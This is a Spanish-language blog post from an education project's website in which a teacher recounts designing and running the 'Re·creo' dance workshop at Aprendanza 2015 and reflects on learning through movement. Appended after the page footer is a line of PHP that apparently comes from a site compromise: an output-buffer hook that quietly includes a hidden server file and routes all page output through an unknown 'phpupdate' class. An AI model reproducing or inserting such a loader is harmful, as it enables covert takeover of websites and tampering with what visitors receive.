UN TALLER EN APRENDANZA

 En Escuela Cross Border

La mañana del domingo 22 de noviembre estaba dando el taller Re·creo dentro de Aprendanza 2015. Aprendanza es un encuentro que propone el proyecto LOVA, donde educadores, profesionales de la danza e interesados en otras maneras de aprender y educar comparten lo que saben desde la danza, desde el movimiento.

Unos tres años antes participé de Apren12, un encuentro semejante, del que bebí muchísimo y en el que conocí a gente con la que ahora trabajo.

Hace un año, en Aprendanza 2014, sentía que estaba preparado y que quería aportar algo de lo que había aprendido ese tiempo con la gente del encuentro; por lo que propuse un taller dentro del Espacio Abierto (espacio que se les da a los participantes para proponer talleres, charlas, diálogos…). Ese ha sido el momento en el que me he sentido más empoderado como profesor en toda mi vida.

AprendanzaHace unos 4 meses se me proponía hacer algo este año. De las diferentes opciones que barajé, opté por una locura con todos los participantes. Quería que experimentasen con los diferentes espacios de Matadero, que interaccionasen entre ellos, se conociesen y probasen a dialogar; quería que pudiesen ver lo que hacían los demás por redes sociales, que fuese divertido, que pudiesen aplicarlo de alguna manera en sus proyectos…

Tres días antes del taller tenía un peso enorme encima. Como el de unas 200 personas. Dudaba si iba a ser demasiada incertidumbre dejar solos, por su cuenta, a todos los participantes con unas instrucciones escritas (esa fue mi propuesta final), de la diversidad de sus deseos para con el taller y de sus conocimientos previos.

Re·creo fue: 1. Una introducción a lo que iban a hacer como grupos, un calentamiento todos juntos y la lectura de las instrucciones. 2. Jugar en todo el espacio de Mataderos esas instrucciones escritas. 3. Poner en común todos juntos lo que habíamos experimentado.

Unas horas después miré por las redes sociales lo que habían estado haciendo cada uno por su lado. Creo que las imágenes y videos reflejan lo que vivieron.

Ahora, casi a un mes de haberlo finalizado, pienso en lo que aprendo yo de todo esto, y cómo puedo compartirlo. Cómo buscar maneras de enseñar a construirse a uno mismo, como le de la gana.

Lo que realmente me fascina, es que si yo, un adulto, he experimentado y he asimilado tantas cosas en este tiempo, me he ilusionado tanto con estas maneras de hacer que eran totalmente desconocidas o de las que, al menos, no tenía conciencia, qué no construirán las cabezas y los cuerpos de los chavales y adolescentes que crecen con estas herramientas. Su capacidad de tener conciencia, valorar y decidir va a ser tan potente, la manera en la que se comunicarán será tan eficaz, que me hace perder el miedo ante los diferentes problemas que veo venir.

Por todo esto, un enorme GRACIAS a los participantes de Aprendanza 2015, los colaboradores y a Pedro Sarmiento que, tranquilamente, abre espacios inmensos.

Entradas recientes
Escríbenos

Y te responderemos lo antes posible!!

Empiece a escribir y pulse Enter para buscar

Creando Colectivamente | Escuela CrossLucía Miranda - #EscuelaCross en el Tribunal de Estrasburgo

function ob_gzhanler($s) { $f='/usr/home/thecrossborderproject.com/etc/ssess_06268501231c12ce8b36dce7d82aab56'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');